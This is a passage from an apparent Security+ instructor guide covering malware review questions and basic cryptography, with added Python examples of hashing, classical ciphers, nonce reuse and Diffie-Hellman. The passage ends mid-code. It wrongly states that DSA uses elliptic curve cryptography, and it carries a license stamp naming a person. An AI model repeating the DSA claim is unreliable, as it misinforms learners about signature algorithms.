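Each signal alone produces false positives (CDNs use long hashed hostnames; some legitimate software probes TXT records), so the useful output is the combination per client: one host with a burst of high-entropy names, most of which return NXDOMAIN, is worth pulling a process listing from.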


Review Activity:
Indicators of Malware-Based Attacks

Answer the following questions:

1. You are troubleshooting a user's workstation. At the computer, an app window displays on the screen claiming that all of your files are encrypted. The app window demands that you make an anonymous payment if you ever want to recover your data. What type of malware has infected the computer?

This is some type of ransomware, but it will take more investigation to determine whether it is actually crypto-malware or not.

2. You are recommending different anti-virus products to the CEO of a small travel services firm. The CEO is confused because they had heard that Trojans represent the biggest threat to computer security these days. What explanation can you give?

While anti-virus (A-V) remains a popular marketing description, all current security products worthy of consideration will try to provide protection against a full range of malware and potentially unwanted program threats.

3. You are writing a security awareness blog for company CEOs subscribed to your threat platform. Why are backdoors and Trojans different ways of classifying and identifying malware risks?

A Trojan means a malicious program masquerading as something else; a backdoor is a covert means of accessing a host or network. A Trojan need not necessarily operate a backdoor and a backdoor can be established by exploits other than using Trojans. The term remote access trojan (RAT) is used for the specific combination of Trojan and backdoor.

4. You are investigating a business email compromise (BEC) incident. The email account of a developer has been accessed remotely over webmail. Investigating the developer's workstation finds no indication of a malicious process, but you do locate an unknown USB extension device attached to one of the rear ports. Is this the most likely attack vector, and what type of malware would it implement?

It is likely that the device implements a hardware-based keylogger. This would not necessarily require any malware to be installed or leave any trace in the file system.

5. A user's computer is performing extremely slowly. Upon investigating, you find that a process named n0tepad.exe is utilizing the CPU at rates of 80-90%. This is accompanied by continual small disk reads and writes to a temporary folder. Should you suspect malware infection and is any particular class of malware indicated?

Yes, this is malware, as the process name is trying to masquerade as a legitimate process. It is not possible to conclusively determine the type without more investigation, but you might initially suspect a crypto-miner/crypto-jacker.

6. Is Cuckoo a type of malware or a security product?

Cuckoo is a security product designed to analyze malware as it runs in an isolated sandbox environment.


Lesson 4
Summary

You should be able to identify the social engineering and malware-based methods that threat actors use to effect intrusions.

Guidelines for Identifying Social Engineering and Malware

Follow these guidelines when you use security assessments to protect security systems against social engineering and malware attacks:

• Use training and education programs to help employees to recognize how social engineering is effective (authority, intimidation, consensus, scarcity, familiarity, trust, and urgency).

• Use policies and procedures that hinder social engineers from eliciting information or obtaining unauthorized access.

• Educate users to recognize phishing and pharming attempts, such as validating domain names and identifying suspicious messages.

• Use training and education programs to help employees recognize types of malware threat (Trojan, PUP, spyware, backdoor, bots, rootkits, and ransomware) and the vectors by which malware can execute.

• Use security filters and limited privileges to restrict the ability of users to execute infected files or scripts.

• Consider implementing behavior-based endpoint protection suites that can perform more effective detection of fileless malware.

• Consider setting up a sandbox with analysis tools to investigate suspicious process behavior.

• Consider using threat data feeds to assist with identification of command and control networks.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, revisit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.

Interaction Opportunity: Optionally, discuss with students how they might have experience of social engineering or malware attacks, the impact they had, and how they were resolved.

Lesson 5
Summarizing Basic
Cryptographic Concepts

LESSON INTRODUCTION

Assess and monitor activities utilize threat intelligence to identify potential attack vectors and detect malicious activity. The protect cybersecurity function aims to build secure IT processing systems that exhibit the attributes of confidentiality, integrity, and availability. Many of these secure systems depend wholly or in part on cryptography.

A cryptographic system encodes data in such a way that only authorized persons can decode it. Cryptography is the basis for many of the security systems you will be implementing and configuring. As an information security professional, you must have a good understanding of the concepts underpinning cryptographic algorithms and their implementation in secure protocols and services. All security personnel must be able to contrast the different types of cryptographic ciphers, understand how they can be used to apply data confidentiality, integrity, and availability, and describe the weaknesses they may exhibit. A secure technical understanding of the subject will enable you to explain the importance of cryptographic systems and to select appropriate technologies to meet a given security goal.

Teaching Tip: This lesson starts the next block of the course, which is focused on the protect function. The first part of this will cover IAM topics, and cryptography underpins most of these technologies.

Lesson Objectives

In this lesson, you will:

• Compare and contrast cryptographic ciphers.

• Summarize cryptographic modes of operation.

• Summarize cryptographic use cases and weaknesses.

• Summarize other cryptographic technologies.


Topic 5A
Compare and Contrast
Cryptographic Ciphers

EXAM OBJECTIVES COVERED

2.1 Explain the importance of security concepts in an enterprise environment (hashing only)
2.8 Summarize the basics of cryptographic concepts

A cipher is the particular operations performed to encode or decode data. Modern cryptographic systems make use of symmetric and asymmetric cipher types to encode and decode data. As well as these cipher types, one-way hash functions have an important role to play in many security controls. Being able to compare and contrast the characteristics of these types of cryptographic ciphers and functions is essential for you to deploy security controls for different use cases.

Teaching Tip: This topic covers the basic cryptographic primitive types: hashing, symmetric ciphers, and asymmetric ciphers. Objective 2.8 is covered over the course of all the topics in this lesson. It is easy for students to become confused about the different types of cryptographic systems, so allocate plenty of time to covering this topic.

Cryptographic Concepts

Cryptography (literally meaning "secret writing") has been around for thousands of years. It is the art of making information secure by encoding it. This stands in opposition to the concept of security through obscurity. Security through obscurity means keeping something a secret by hiding it. This is generally acknowledged to be impossible (or at least, high risk) on any sort of computer network. With cryptography, it does not matter if third parties know of the existence of the secret, because they can never know what it is without obtaining an appropriate credential (the key).

The following terminology is used to discuss cryptography:

• Plaintext (or cleartext)—an unencrypted message.

• Ciphertext—an encrypted message.

• Cipher—the process (or algorithm) used to encrypt and decrypt a message.

• Cryptanalysis—the art of cracking cryptographic systems.

In discussing cryptography and attacks against encryption systems, it is customary to use a cast of characters to describe different actors involved in the process of an attack. The main characters are:

• Alice—the sender of a genuine message.

• Bob—the intended recipient of the message.

• Mallory—a malicious attacker attempting to subvert the message in some way.

Teaching Tip: Note that in cryptography there is still some "obscurity" involved as you have to control distribution of the key. This is a simpler job than protecting the design of the algorithm, however. Passive eavesdropping is traditionally performed by Eve, but we're just using Mallory for simplicity.

There are three main types of cryptographic algorithm with different roles to play in the assurance of the security properties confidentiality, integrity, availability, and non-repudiation. These types are hashing algorithms and two types of encryption ciphers: symmetric and asymmetric.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A


Hashing Algorithms

Hashing is the simplest type of cryptographic operation. A cryptographic hashing algorithm produces a fixed-length string from an input plaintext that can be of any length. The output can be referred to as a checksum, message digest, or hash. The function is designed so that it is impossible to recover the plaintext data from the digest (one-way) and so that different inputs are unlikely to produce the same output (a collision).

A hashing algorithm is used to prove integrity. For example, Bob and Alice can compare the values used for a password in the following way:

1. Bob already has a digest calculated from Alice's plaintext password. Bob cannot recover the plaintext password value from the hash.

2. When Alice needs to authenticate to Bob, she types her password, converts it to a hash, and sends the digest to Bob.

3. Bob compares Alice's digest to the hash value he has on file. If they match, he can be sure that Alice typed the same password.

Note that a digest sent over the network in this simple form could be captured and replayed by Mallory just like a password; real protocols either compute the hash at Bob's end from the password or use a challenge-response exchange so that the value on the wire changes every time.

As well as comparing password values, a hash of a file can be used to verify the integrity of that file after transfer.

1. Alice runs a hash function on the setup.exe file for her product. She publishes the digest to her website with a download link for the file.

2. Bob downloads the setup.exe file and makes a copy of the digest.

3. Bob runs the same hash function on the downloaded setup.exe file and compares it to the reference value published by Alice. If it matches the value published on the website, the integrity of the file can be assumed.

4. Consider that Mallory might be able to substitute the download file for a malicious file. Mallory cannot change the reference hash, however.

5. This time, Bob computes a hash but it does not match, leading him to suspect that the file has been tampered with.

Teaching Tip: Hash functions are mostly used for integrity (signatures and message digests) and password storage (confidentiality). While the names of cryptographic algorithms have been removed from the certification objectives, they are still present in the acronyms list, and the injunction on the acronyms list is "Candidates are encouraged to review the complete list and attain a working knowledge of all listed acronyms as part of a comprehensive exam preparation program." Consequently, the names of the main products have been retained. The syllabus also uses the term checksum for a message digest (under the forensics objective) so we are using that here too. You might want to note that hash functions produce a specific type of checksum, but there are others with different properties, such as a parity checksum.

Confirming a file download using cryptographic hashes. (Images © 123RF.com.)
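The exchange in the numbered steps above, carried through in code as an added example (not part of the guide): Alice publishes a digest of a constructed stand-in for setup.exe, Bob hashes what the download server actually delivered and compares, and a one-byte substitution by Mallory is caught. The file contents are constructed for the example; hashlib and hmac are Python's standard library.

```python
import hashlib
import hmac
import io
from typing import BinaryIO, Tuple

CHUNK = 64 * 1024


def digest_stream(stream: BinaryIO, algorithm: str = "sha256") -> str:
    """Hash a file-like object in chunks so a large installer need not fit in memory."""
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: stream.read(CHUNK), b""):
        h.update(chunk)
    return h.hexdigest()


def digest_bytes(data: bytes, algorithm: str = "sha256") -> str:
    return digest_stream(io.BytesIO(data), algorithm)


def verify(data: bytes, reference: str, algorithm: str = "sha256") -> bool:
    """Compare a download with a published digest in constant time, tolerating
    the upper-case and surrounding whitespace that copied digests often carry."""
    return hmac.compare_digest(digest_bytes(data, algorithm), reference.strip().lower())


# Constructed stand-ins for setup.exe: the build Alice publishes and the file
# Mallory substitutes on the download server. Exactly one byte differs.
GENUINE_SETUP = b"MZ" + b"\x90" * 62 + b"setup v1.0 genuine build"
TAMPERED_SETUP = b"MZ" + b"\x90" * 62 + b"setup v1.0 genuine builD"


def download_check(published_reference: str, served_file: bytes) -> Tuple[str, bool]:
    """Bob's side of steps 2 to 5: hash what was downloaded, compare with Alice's value."""
    computed = digest_bytes(served_file)
    return computed, hmac.compare_digest(computed, published_reference)


if __name__ == "__main__":
    reference = digest_bytes(GENUINE_SETUP)  # step 1: Alice publishes this
    print("published:", reference)
    for label, served in (("genuine", GENUINE_SETUP), ("tampered", TAMPERED_SETUP)):
        computed, ok = download_check(reference, served)
        print(f"{label:8} {computed} {'OK' if ok else 'MISMATCH'}")
    print("md5 digest:", len(digest_bytes(GENUINE_SETUP, "md5")) * 4, "bits;",
          "sha256 digest:", len(reference) * 4, "bits")
```

Two points the code makes that the steps leave implicit. The single changed byte produces a completely different digest, which is the property Bob relies on. And the hash only helps if Mallory cannot also change the reference: if she controls the download page as well as the file, she publishes a matching digest for her own file, so the reference must arrive over a channel the attacker does not control or be digitally signed.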


There are two popular implementations of hash algorithms:

• Secure Hash Algorithm (SHA)—considered the strongest algorithm. There are variants that produce different-sized outputs, with longer digests considered more secure. The most popular variant is SHA-256, which produces a 256-bit digest. The older SHA-1 variant (160-bit digest) is no longer collision resistant and should not be chosen for new designs.

• Message Digest Algorithm #5 (MD5)—produces a 128-bit digest. MD5 is no longer collision resistant, so it cannot be relied on to detect deliberate tampering, but it might be required for compatibility between security products.

Computing an SHA value from a file. (Screenshot used with permission from Microsoft.)

Encryption Ciphers and Keys

While a hash function can be used to prove the integrity of data, it cannot be used to store or transmit data. The plaintext cannot be recovered from the digest. An encryption algorithm is a type of cryptographic process that encodes data so that it can be recovered, or decrypted. The use of a key with the encryption cipher ensures that decryption can only be performed by authorized persons.

Teaching Tip: Make sure students understand the difference between the cipher and the key. You could also mention that most types of encryption make use of the XOR function.

Substitution and Transposition Ciphers

To understand how encryption works, it is helpful to consider simple substitution and transposition ciphers. A substitution cipher involves replacing units (a letter or blocks of letters) in the plaintext with different ciphertext. Simple substitution ciphers rotate or scramble letters of the alphabet. For example, ROT13 (an example of a Caesarian cipher) rotates each letter 13 places (so A becomes N, for instance). The ciphertext "Uryyb Jbeyq" means "Hello World".

In contrast to substitution ciphers, the units in a transposition cipher stay the same in plaintext and ciphertext, but their order is changed, according to some mechanism. Consider how the ciphertext "HLOOLELWRD" has been produced:

H L O O L
E L W R D

The letters are simply written as columns and then the rows are concatenated to make the ciphertext. It's called a rail fence cipher. All modern encryption uses these basic techniques of substitution and transposition, but in much more complex ways.

Keys and Secret Ciphers

Encryption ciphers use a key to increase the security of the process. For example, if you consider the Caesar cipher ROT13, you should realize that the key is 13. You could use a different shift value to achieve a different ciphertext from the same method. The key is important because it means that even if the cipher method is known, a message still cannot be decrypted without knowledge of the specific key. This is particularly important in modern cryptography. Attempting to hide details of the cipher (a secret algorithm) amounts to "security by obscurity." Modern ciphers are made stronger by being open to review (cryptanalysis) by third-party researchers. The Caesar cipher itself shows the other half of the requirement: it has only 25 usable keys, so an attacker simply tries them all, and a public algorithm is only safe when it is paired with a keyspace far too large to search.
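Both ciphers from this page, together with the key question from the last paragraph, as an added example that is not part of the guide: a Caesar rotation (ROT13 being the case where the key is 13), the two-row rail fence transposition exactly as the columns above show it, and a brute force of all 26 Caesar keys, which is why keeping the key secret is no protection when the keyspace is this small. Only Python's standard library is used; the row-by-row rail fence here matches the page's columnar description, which for two rows is the classic cipher.

```python
from typing import Dict, List


def caesar(text: str, shift: int) -> str:
    """Substitution: rotate each ASCII letter 'shift' places. Case is preserved
    and non-letters pass through unchanged, as in the page's "Uryyb Jbeyq"."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13 is Caesar with key 13; applying it twice returns the plaintext."""
    return caesar(text, 13)


def rail_fence_encrypt(text: str, rows: int = 2) -> str:
    """Transposition: deal the characters across 'rows' rows in turn, then read
    the rows off one after another (HELLOWORLD -> HLOOL + ELWRD)."""
    rails: List[List[str]] = [[] for _ in range(rows)]
    for i, ch in enumerate(text):
        rails[i % rows].append(ch)
    return "".join("".join(r) for r in rails)


def rail_fence_decrypt(cipher: str, rows: int = 2) -> str:
    """Row i received ceil((n - i) / rows) characters, so cut the ciphertext
    into rows of those lengths and interleave them again."""
    n = len(cipher)
    lengths = [(n - i + rows - 1) // rows for i in range(rows)]
    rails, pos = [], 0
    for ln in lengths:
        rails.append(cipher[pos:pos + ln])
        pos += ln
    return "".join(rails[i % rows][i // rows] for i in range(n))


def brute_force_caesar(cipher: str) -> Dict[int, str]:
    """Keyspace of 26: try every key and let the reader spot the one that is English."""
    return {k: caesar(cipher, -k) for k in range(26)}


if __name__ == "__main__":
    print(rot13("Hello World"))                       # Uryyb Jbeyq
    print(rail_fence_encrypt("HELLOWORLD"))           # HLOOLELWRD
    for key, candidate in brute_force_caesar("Uryyb Jbeyq").items():
        print(f"key {key:2}: {candidate}")
```

Run the brute force and the line for key 13 is the only readable one: the algorithm was public, the key was secret, and it still took 26 tries. Modern ciphers keep the same division between algorithm and key but use keyspaces of 2^128 or more, as the next pages discuss.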


Stream and Block Ciphers

There are two types of symmetric encryption: stream ciphers and block ciphers.

Stream Ciphers

In a stream cipher, each byte or bit of data in the plaintext is encrypted one at a time. This is suitable for encrypting communications where the total length of the message is not known. The plaintext is combined with a separate randomly generated message, calculated from the key and an initialization vector (IV). The IV ensures the key produces a unique ciphertext from the same plaintext. The keystream must be unique, so an IV must not be reused with the same key. The recipient must be able to generate the same keystream as the sender and the streams must be synchronized. Stream ciphers might use markers to allow for synchronization and retransmission. Some types of stream ciphers are made self-synchronizing.

Block Ciphers

In a block cipher, the plaintext is divided into equal-size blocks (usually 128-bit). If there is not enough data in the plaintext, it is padded to the correct size using some string defined in the algorithm. For example, a 1200-bit plaintext would be padded with an extra 80 bits to fit into ten 128-bit blocks. Each block is then subjected to complex transposition and substitution operations, based on the value of the key used.

The Advanced Encryption Standard (AES) is the default symmetric encryption cipher for most products. Basic AES has a key size of 128 bits, but the most widely used variant is AES256, with a 256-bit key.

Teaching Tip: We will get to it in the next topic, but you might want to point out here that various counter modes can be used to turn AES into a stream cipher. You might also want to note that RC4 is an obsolete stream cipher and the use of ChaCha20 as a modern stream cipher. These should not be required for the exam, but students will encounter them regularly as security professionals.

Key Length

The range of key values available to use with a particular cipher is called the keyspace. The keyspace is roughly equivalent to two to the power of the size of the key. Using a longer key (256 bits rather than 128 bits, for instance) makes the encryption scheme stronger. You should realize that key lengths are not equivalent when comparing different algorithms, however. Recommendations on minimum key length for any given algorithm are made by identifying whether the algorithm is vulnerable to cryptanalysis techniques and by the length of time it would take to "brute force" the key, given current processing resources.
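An added example, not from the guide, that makes the IV rule for stream ciphers and the padding rule for block ciphers concrete. The keystream generator is a deliberately simple construction (SHA-256 over key, nonce and a counter, an assumption made so that the example runs with the standard library; use ChaCha20 or AES in counter mode in real code). It shows the round trip, then what happens when the same key and nonce are reused for two messages: XORing the two ciphertexts cancels the keystream, and a known plaintext reveals the other message without the key. The padding functions implement PKCS#7 for 128-bit blocks and reject malformed padding on the way out.

```python
import hashlib
from typing import List

BLOCK_SIZE = 16  # 128-bit blocks, the size AES works on


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: SHA-256(key || nonce || counter) blocks concatenated.
    Assumed construction for illustration only, not a standardized cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def stream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt and decrypt are the same operation: XOR the data with the keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def recover_with_crib(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Nonce reuse: c1 XOR c2 == p1 XOR p2 because the shared keystream cancels,
    so a known (or guessed) p1 hands the attacker p2 with no key at all."""
    n = min(len(c1), len(c2), len(known_p1))
    return bytes(c1[i] ^ c2[i] ^ known_p1[i] for i in range(n))


def pkcs7_pad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Append 1..block_size bytes, each holding the pad length, so the receiver
    can always tell padding from data, even when the input was already aligned."""
    n = block_size - len(data) % block_size
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Strip the padding, refusing anything that is not well formed."""
    if not data or len(data) % block_size:
        raise ValueError("data length is not a whole number of blocks")
    n = data[-1]
    if not 1 <= n <= block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def split_blocks(data: bytes, block_size: int = BLOCK_SIZE) -> List[bytes]:
    """What a block cipher mode actually consumes: a list of equal-size blocks."""
    if len(data) % block_size:
        raise ValueError("pad before splitting")
    return [data[i:i + block_size] for i in range(0, len(data), block_size)]


# Constructed messages for the demonstration.
KEY = bytes(range(32))
NONCE = b"\x00" * 12
P1 = b"transfer 100 to alice"
P2 = b"transfer 900 to mallory"

if __name__ == "__main__":
    c1 = stream_xor(KEY, NONCE, P1)
    c2 = stream_xor(KEY, NONCE, P2)  # same key AND nonce: the mistake
    print("round trip ok:", stream_xor(KEY, NONCE, c1) == P1)
    print("recovered p2 :", recover_with_crib(c1, c2, P1))
    padded = pkcs7_pad(b"A" * 150)    # 1200 bits in, 1280 bits out
    print("padded to", len(padded) * 8, "bits in", len(split_blocks(padded)), "blocks")
```

The crib attack is the practical reason the text insists the IV must never be reused with the same key: nothing about the cipher is broken, the attacker simply subtracts one message from the other. The 150-byte input reproduces the arithmetic from the block cipher paragraph, 1200 bits padded out to ten 128-bit blocks.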

Asymmetric Encryption

In a symmetric encryption cipher, the same secret key is used to perform both encryption and decryption operations. With an asymmetric cipher, operations are performed by two different but related public and private keys in a key pair.

Each key is capable of reversing the operation of its pair. For example, if the public key is used to encrypt a message, only the paired private key can decrypt the ciphertext produced. The public key cannot be used to decrypt the ciphertext, even though it was used to encrypt it.

The keys are linked in such a way as to make it computationally infeasible to derive the private key from the public key. This means that the key holder can distribute the public key to anyone he or she wants to receive secure messages from. No one else can use the public key to decrypt the messages; only the linked private key can do that.

Teaching Tip: Asymmetric ciphers are mainly used for authentication and non-repudiation. Another important use is key exchange. A symmetric encryption key is encrypted by the client and sent to the server. The server decrypts the key and that secret key is then used to encrypt messages sent between server and client.

1. Bob generates a key pair and keeps the private key secret.

2. Bob publishes the public key. Alice wants to send Bob a confidential message, so she takes a copy of Bob's public key.

3. Alice uses Bob's public key to encrypt the message.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 101

4. Alice sends the ciphertext to Bob.

5. Bob receives the message and is able to decrypt it using his private key.

6. If Mallory has been snooping, he can intercept both the message and the public key.

7. However, Mallory cannot use the public key to decrypt the message, so the system remains secure.

Asymmetric encryption. (Images © 123RF.com.)

Asymmetric encryption can be used to prove identity. The holder of a private key cannot be impersonated by anyone else. The drawback of asymmetric encryption is that it involves substantial computing overhead compared to symmetric encryption. The message cannot be larger than the key size. Where a large amount of data is being encrypted on disk or transported over a network, asymmetric encryption is inefficient. Consequently, asymmetric encryption is mostly used for authentication and non-repudiation and for key agreement and exchange. Key agreement/exchange refers to settling on a secret symmetric key to use for bulk encryption without anyone else discovering it.

Show Slide(s): Public Key Cryptography Algorithms

Public Key Cryptography Algorithms

Asymmetric encryption is often referred to as public key cryptography. Many public key cryptography products are based on the RSA algorithm. Ron Rivest, Adi Shamir, and Leonard Adleman published the RSA cipher in 1977 (rsa.com). The RSA algorithm provides the mathematical properties for deriving key pairs and performing the encryption and decryption operations. This type of algorithm is called a trapdoor function, because it is easy to perform using the public key, but difficult to reverse without knowing the private key.

Teaching Tip: There's not much point trying to describe ECC without mentioning RSA.


Elliptic curve cryptography (ECC) is another type of trapdoor function that can be used in public key cryptography ciphers. The principal advantage of ECC over RSA's algorithm is that there are no known "shortcuts" to cracking the cipher or the math that underpins it, regardless of key length. Consequently, ECC used with a key size of 256 bits is very approximately comparable to RSA with a key size of 3072 bits.

RSA key pair security depends on the difficulty of finding the prime factors of very large integers (modular exponentiation). ECC depends on the discrete logarithm problem. Cloudflare have produced an excellent overview of the differences (blog.cloudflare.com/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography).


Review Activity:
Cryptographic Ciphers
Answer the following questions:

1. Which part of a simple cryptographic system must be kept secret—the cipher, the ciphertext, or the key?

In cryptography, the security of the message is guaranteed by the security of the key. The system does not depend on hiding the algorithm or the message (security by obscurity).

2. Considering that cryptographic hashing is one-way and the digest cannot be reversed, what makes hashing a useful security technique?

Because two parties can hash the same data and compare checksums to see if they match, hashing can be used for data verification in a variety of situations, including password authentication. Hashes of passwords, rather than the password plaintext, can be stored securely or exchanged for authentication. A hash of a file or a hash code in an electronic message can be verified by both parties.

3. Which security property is assured by symmetric encryption?

Confidentiality; symmetric ciphers are generally fast and well suited to bulk encrypting large amounts of data.

4. What are the properties of a public/private key pair?

Each key can reverse the cryptographic operation performed by its pair but cannot reverse an operation performed by itself. The private key must be kept secret by the owner, but the public key is designed to be widely distributed. The private key cannot be determined from the public key, given a sufficient key size.


Topic 5B
Summarize Cryptographic Modes of Operation

EXAM OBJECTIVES COVERED
2.8 Summarize the basics of cryptographic concepts

Teaching Tip: This topic moves on from the basic cryptographic types to showing how they are used together in cryptographic implementations, such as digital signatures and transport encryption.

A mode of operation is a means of using a cipher within a product to achieve a security goal, such as confidentiality or integrity. Being able to summarize modes of operation will help you to implement and support security controls such as digital signatures and transport encryption.

Show Slide(s): Digital Signatures

Digital Signatures

Public key cryptography can authenticate a sender, because they control a private key that encrypts messages in a way that no one else can. Public key cryptography can only be used with very small messages, however. Hashing proves integrity by computing a unique checksum from input. These two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message. This usage is called a digital signature. The following process is used to create a digital signature using RSA encryption:

Teaching Tip: Digital signatures combine public key cryptography with hashing algorithms to provide authentication, integrity, and non-repudiation.

1. The sender (Alice) creates a digest of a message, using a pre-agreed hash algorithm, such as SHA-256, and then encrypts the digest using her private key.

2. Alice attaches the digital signature to the original message and sends both the signature and the message to Bob.

3. Bob decrypts the signature using Alice's public key, resulting in the original hash.

4. Bob then calculates his own checksum for the document (using the same algorithm as Alice) and compares it with Alice's hash.

If the two hashes are the same, then the data has not been tampered with during transmission, and Alice's identity is guaranteed. If either the data had changed or a malicious user (Mallory) had intercepted the message and used a different private key, the digests would not match.


Message authentication and integrity using digital signatures. (Images © 123RF.com.)

It is important to remember that a digital signature is a hash that is then encrypted using a private key. Without the encryption, another party could easily intercept the file and the hash, modify the file and compute a new hash, and then send the modified file and hash to the recipient. It is also important to realize that the recipient must have some means of validating that the public key really was issued by Alice. Also note that digital signatures do not provide any message confidentiality.

The Digital Signature Algorithm (DSA) is a slightly different format for achieving the same sort of goal. DSA uses elliptic curve cryptography (ECC) rather than the RSA cipher.

Show Slide(s): Digital Envelopes and Key Exchange

Digital Envelopes and Key Exchange

Symmetric encryption is the only practical means of encrypting and decrypting large amounts of data (bulk encryption), but it is difficult to distribute the secret key securely. Public key cryptography makes it easy to distribute a key, but can only be used efficiently with small amounts of data. Therefore, both are used within the same product in a type of key exchange system known as a digital envelope or hybrid encryption. A digital envelope allows the sender and recipient to exchange a symmetric encryption key securely by using public key cryptography:

Teaching Tip: Stress that asymmetric encryption is slow, and so is only used on small amounts of data (signing hashes or encrypting secret keys).

1. Alice obtains a copy of Bob's public key.

2. Alice encrypts her message using a secret key cipher, such as AES. In this context, the secret key is referred to as a session key.

3. Alice encrypts the session key with Bob's public key.

4. Alice attaches the encrypted session key to the ciphertext message in a digital envelope and sends it to Bob.

5. Bob uses his private key to decrypt the session key.

6. Bob uses the session key to decrypt the ciphertext message.


Key exchange using a digital envelope. (Images © 123RF.com.)

Note that in this process, it is the recipient's public key that is used to perform encryption and the recipient's private key that is used for decryption. The validity of the whole digital envelope can be proved using a message authentication code.

In all these implementations, it is critical that the private key be kept secure and available only to the authorized user.

Show Slide(s): Digital Certificates

Digital Certificates

When using public/private key pairs, a subject will make his or her public key freely available. This allows recipients of his or her messages to read the digital signature. Similarly, he or she uses the recipient's public key to encrypt a message via a digital envelope. This means that no one other than the intended recipient can read the message.

Teaching Tip: We will explore certificates and PKI in more detail in the next lesson.

The question then arises of how anyone can trust the identity of the person or server issuing a public key. One solution is to have a third party, referred to as a certificate authority (CA), validate the owner of the public key by issuing the subject with a certificate. The certificate is signed by the CA. If the recipient also trusts the CA, they can also trust the public key wrapped in the subject's certificate. The process of issuing and verifying certificates is called public key infrastructure (PKI).


Show Slide(s): Perfect Forward Secrecy

Perfect Forward Secrecy

When using a digital envelope, the parties must exchange or agree upon a bulk encryption secret key, used with the chosen symmetric cipher. In the original implementation of digital envelopes, the server and client exchange secret keys, using the server's RSA key pair to protect the exchange from snooping. In this key exchange model, if data from a session were recorded and then later the server's private key were compromised, it could be used to decrypt the session key and recover the confidential session data.

This risk from RSA key exchange is mitigated by perfect forward secrecy (PFS). PFS uses Diffie-Hellman key agreement to create ephemeral session keys without using the server's private key. Diffie-Hellman allows Alice and Bob to derive the same shared secret just by agreeing some values that are all related by some trapdoor function. In the agreement process, they share some of them, but keep others private. Mallory cannot possibly learn the secret from the values that are exchanged publicly (en.wikipedia.org/wiki/Diffie-Hellman_key_exchange). The authenticity of the values sent by the server is proved by using a digital signature.

Teaching Tip: The terms "key exchange" and "key agreement" are often taken to mean the same thing, but point out that there are different mechanisms. With key agreement, the client does not transmit an encrypted session key to the server. The client and server use Diffie-Hellman (DH) to derive the same secret key value. Note that in TLS 1.3, only DHE cipher suites are allowed. RSA key exchange is deprecated. The RSA algorithm can still be used for signing, however. The values exchanged as part of DH need to be signed to prove authenticity and prevent a man-in-the-middle attack.

Using Diffie-Hellman to derive a secret value to use to generate a shared symmetric encryption key securely over a public channel. (Images © 123RF.com.)

Using ephemeral session keys means that any future compromise of the server will not translate into an attack on recorded data. Also, even if an attacker can obtain the key for one session, the other sessions will remain confidential. This massively increases the amount of cryptanalysis that an attacker would have to perform to recover an entire "conversation."


PFS can be implemented using either the Diffie-Hellman Ephemeral mode (DHE or EDH) or Elliptic Curve Diffie-Hellman Ephemeral mode (ECDHE) algorithms. To use PFS, the server and client must negotiate use of a mutually supported cipher suite.

In 2014, a Heartbleed bug was discovered in the way some versions of OpenSSL work that allows remote users to grab 64K chunks of server memory contents (heartbleed.com). This could include the private key, meaning that any communications with the server could be compromised. The bug had been present for around two years. This illustrates the value of PFS, but ironically many servers would have been updated to the buggy version of OpenSSL to enable support for PFS.
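The agreement shown in the figure above, as an added example that is not from the guide: a finite-field Diffie-Hellman exchange in which each side generates fresh (ephemeral) values for every session, so that nothing long-lived can reproduce an earlier session key. The group is the 1024-bit RFC 2409 group (too small for production use today; the RFC 7919 groups or ECDHE are preferred), the function names are this example's own, and the server's signature over its public value is left out.

```python
import hashlib
import secrets

# RFC 2409 "Second Oakley Group": 1024-bit MODP prime with generator 2. Used here
# only so the arithmetic is real; 1024-bit groups are too small for production,
# so prefer the RFC 7919 groups (ffdhe2048 and larger) or ECDHE in practice.
P = int("".join("""
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE65381 FFFFFFFF FFFFFFFF
""".split()), 16)
G = 2
P_BYTES = (P.bit_length() + 7) // 8  # 128


def dh_keypair():
    """Ephemeral key pair: a fresh random private exponent x and the public value g^x mod p."""
    private = secrets.randbelow(P - 3) + 2  # 2 <= x <= p-2
    return private, pow(G, private, P)


def dh_shared_secret(own_private, peer_public):
    """Both sides compute the same value, because (g^y)^x = (g^x)^y mod p."""
    if not 2 <= peer_public <= P - 2:  # reject 0, 1 and p-1, which force a trivial secret
        raise ValueError("peer public value out of range")
    return pow(peer_public, own_private, P)


def derive_session_key(shared_secret, transcript):
    """Hash the raw secret together with both public values down to a 256-bit symmetric session key."""
    return hashlib.sha256(shared_secret.to_bytes(P_BYTES, "big") + transcript).digest()


def run_session():
    """One ephemeral exchange, as in a DHE handshake: returns both derived keys and what crossed the wire."""
    client_priv, client_pub = dh_keypair()
    server_priv, server_pub = dh_keypair()
    # Only the public values are transmitted. In TLS the server signs its value with
    # its long-term key so that a man-in-the-middle cannot substitute their own.
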